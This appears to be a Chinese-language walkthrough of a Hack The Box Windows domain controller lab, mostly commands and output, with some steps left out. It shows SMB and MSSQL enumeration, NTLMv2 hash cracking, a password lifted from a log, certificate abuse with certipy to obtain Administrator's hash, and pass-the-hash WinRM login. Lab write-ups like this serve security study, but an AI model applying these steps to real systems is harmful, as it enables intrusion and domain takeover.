[~] The config file is expected to be at "/root/.rustscan.toml" [~] Automatically increasing ulimit value to 5000. Open 10.10.11.202:53 Open 10.10.11.202:88 Open 10.10.11.202:135 Open 10.10.11.202:139 Open 10.10.11.202:389 Open 10.10.11.202:445 Open 10.10.11.202:464 Open 10.10.11.202:593 Open 10.10.11.202:636 Open 10.10.11.202:1433 Open 10.10.11.202:3269 Open 10.10.11.202:3268 Open 10.10.11.202:5985 Open 10.10.11.202:9389 Open 10.10.11.202:49667 Open 10.10.11.202:49689 Open 10.10.11.202:49690 Open 10.10.11.202:49712 Open 10.10.11.202:49724 Open 10.10.11.202:49727
SMB信息收集
使用smbclient尝试匿名访问
1 2 3 4 5 6 7 8 9
smbclient -L //10.10.11.202 Password for [WORKGROUP\root]: Sharename Type Comment --------- ---- ------- ADMIN$ Disk Remote Admin C$ Disk Default share IPC$ IPC Remote IPC NETLOGON Disk Logon server share Public Disk SYSVOL Disk Logon server share
发现可以匿名访问
1 2 3 4 5 6 7 8 9 10
smbclient //10.10.11.202/Public Password for [WORKGROUP\root]: Try "help" to get a list of possible commands. smb: \> ls . D 0 Sat Nov 19 19:51:25 2022 .. D 0 Sat Nov 19 19:51:25 2022 SQL Server Procedures.pdf A 49551 Fri Nov 18 21:39:43 2022
5184255 blocks of size 4096. 1449739 blocks available smb: \>
impacket-mssqlclient PublicUser:GuestUserCantWrite1@10.10.11.202 Impacket v0.12.0 - Copyright Fortra, LLC and its affiliated companies
[*] Encryption required, switching to TLS [*] ENVCHANGE(DATABASE): Old Value: master, New Value: master [*] ENVCHANGE(LANGUAGE): Old Value: , New Value: us_english [*] ENVCHANGE(PACKETSIZE): Old Value: 4096, New Value: 16192 [*] INFO(DC\SQLMOCK): Line 1: Changed database context to 'master'. [*] INFO(DC\SQLMOCK): Line 1: Changed language setting to us_english. [*] ACK: Result: 1 - Microsoft SQL Server (150 7208) [!] Press help for extra shell commands SQL (PublicUser guest@master)>
尝试使用xp_cmdshell执行命令
1 2
SQL (PublicUser guest@master)> xp_cmdshell whoami ERROR(DC\SQLMOCK): Line 1: The EXECUTE permission was denied on the object 'xp_cmdshell', database 'mssqlsystemresource', schema 'sys'.
john hash --wordlist=/usr/share/wordlists/rockyou.txt Using default input encoding: UTF-8 Loaded 1 password hash (netntlmv2, NTLMv2 C/R [MD4 HMAC-MD5 32/64]) Will run 2 OpenMP threads Press 'q' or Ctrl-C to abort, almost any other key for status REGGIE1234ronnie (sql_svc) 1g 0:00:00:17 DONE (2025-03-19 20:46) 0.05656g/s 605248p/s 605248c/s 605248C/s REINLY..REDMAN69 Use the "--show --format=netntlmv2" options to display all of the cracked passwords reliably Session completed.
Mode LastWriteTime Length Name ---- ------------- ------ ---- d----- 2/7/2023 8:58 AM Administrator d-r--- 7/20/2021 12:23 PM Public d----- 2/1/2023 6:37 PM Ryan.Cooper d----- 2/7/2023 8:10 AM sql_svc
发现另一个用户Ryan.Cooper
1 2 3 4 5 6 7 8 9
*Evil-WinRM* PS C:\SQLServer\Logs> ls
Directory: C:\SQLServer\Logs
Mode LastWriteTime Length Name ---- ------------- ------ ---- -a---- 2/7/2023 8:06 AM 27608 ERRORLOG.BAK
在这个目录找到个错误日志的备份,type查看一下
1 2 3 4 5 6 7
2022-11-18 13:43:07.44 Logon Error: 18456, Severity: 14, State: 8. 2022-11-18 13:43:07.44 Logon Logon failed for user 'sequel.htb\Ryan.Cooper'. Reason: Password did not match that for the login provided. [CLIENT: 127.0.0.1] 2022-11-18 13:43:07.48 Logon Error: 18456, Severity: 14, State: 8. 2022-11-18 13:43:07.48 Logon Logon failed for user 'NuclearMosquito3'. Reason: Password did not match that for the login provided. [CLIENT: 127.0.0.1] 2022-11-18 13:43:07.72 spid51 Attempting to load library 'xpstar.dll' into memory. This is an informational message only. No user action is required. 2022-11-18 13:43:07.76 spid51 Using 'xpstar.dll' version '2019.150.2000' to execute extended stored procedure 'xp_sqlagent_is_starting'. This is an informational message only; no user action is required. 2022-11-18 13:43:08.24 spid51 Changed database context to 'master'.
在日志的最后找到Ryan.Cooper用户的密码
1 2
username: Ryan.Cooper password: NuclearMosquito3
使用netexec 继续验证一下该用户
1 2 3
netexec winrm 10.10.11.202 -u Ryan.Cooper -p NuclearMosquito3 WINRM 10.10.11.202 5985 DC [*] Windows 10 / Server 2019 Build 17763 (name:DC) (domain:sequel.htb) WINRM 10.10.11.202 5985 DC [+] sequel.htb\Ryan.Cooper:NuclearMosquito3 (Pwn3d!)
[+] Generating RSA key [*] Requesting certificate via RPC [+] Trying to connect to endpoint: ncacn_np:10.10.11.202[\pipe\cert] [+] Connected to endpoint: ncacn_np:10.10.11.202[\pipe\cert] [*] Successfully requested certificate [*] Request ID is 12 [*] Got certificate with UPN 'Administrator' [*] Certificate has no object SID [*] Saved certificate and private key to 'administrator.pfx'
先同步一下时间
1
ntpdate -s sequel.htb
继续攻击
1 2 3 4 5 6 7 8 9
certipy-ad auth -pfx administrator.pfx -username Administrator -domain sequel.htb -dc-ip 10.10.11.202 -debug Certipy v4.8.2 - by Oliver Lyak (ly4k)
[*] Using principal: administrator@sequel.htb [*] Trying to get TGT... [*] Got TGT [*] Saved credential cache to 'administrator.ccache' [*] Trying to retrieve NT hash for 'administrator' [*] Got hash for 'administrator@sequel.htb': aad3b435b51404eeaad3b435b51404ee:a52f78e4c751e5f5e17e1e9f3e58f4ee
现在就拿到了Administrator的hash了,使用netexec测试能否通过winrm连接
1 2 3
netexec winrm 10.10.11.202 -u administrator -H aad3b435b51404eeaad3b435b51404ee:a52f78e4c751e5f5e17e1e9f3e58f4ee WINRM 10.10.11.202 5985 DC [*] Windows 10 / Server 2019 Build 17763 (name:DC) (domain:sequel.htb) WINRM 10.10.11.202 5985 DC [+] sequel.htb\administrator:a52f78e4c751e5f5e17e1e9f3e58f4ee (Pwn3d!)